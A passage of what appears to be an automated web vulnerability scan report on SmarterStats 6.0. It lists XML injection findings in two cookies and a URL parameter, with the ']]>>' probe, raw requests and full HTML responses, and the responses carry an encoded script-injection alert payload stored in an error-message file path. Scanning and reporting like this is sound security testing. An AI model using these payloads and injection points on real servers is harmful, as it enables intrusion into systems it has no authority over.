<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEzMzA1ODgwMQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgMPFgIeB1Zpc2libGVoZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBD2QWAgIBDxYCHgRUZXh0BbsEPGRpdiBjbGFzcz0iVGlwVGV4dEZhaWx1cmUiPkltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPjwvZGl2PmQCCA8WAh8CaGRkvhHdspcJKxLPz9qe3eyR5QNnEJr+H1LfcMEm11gTyGU=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [loginsettings cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The loginsettings cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the loginsettings cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott]]>>; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:45 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7086



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEzMzA1ODgwMQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgMPFgIeB1Zpc2libGVoZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBD2QWAgIBDxYCHgRUZXh0BbsEPGRpdiBjbGFzcz0iVGlwVGV4dEZhaWx1cmUiPkltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPjwvZGl2PmQCCA8WAh8CaGRkvhHdspcJKxLPz9qe3eyR5QNnEJr+H1LfcMEm11gTyGU=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.9. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [reportID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The reportID parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the reportID parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace]]>> HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:59 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7138



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace%5d%5d%3e%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEzMzA1ODgwMQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgMPFgIeB1Zpc2libGVoZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBD2QWAgIBDxYCHgRUZXh0BbsEPGRpdiBjbGFzcz0iVGlwVGV4dEZhaWx1cmUiPkltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPjwvZGl2PmQCCA8WAh8CaGRkvhHdspcJKxLPz9qe3eyR5QNnEJr+H1LfcMEm11gTyGU=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace\x5d\x5d\x3e\x3e');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace\x255d\x255d\x253e\x253e'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.10. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STHashCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The STHashCookie cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STHashCookie cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
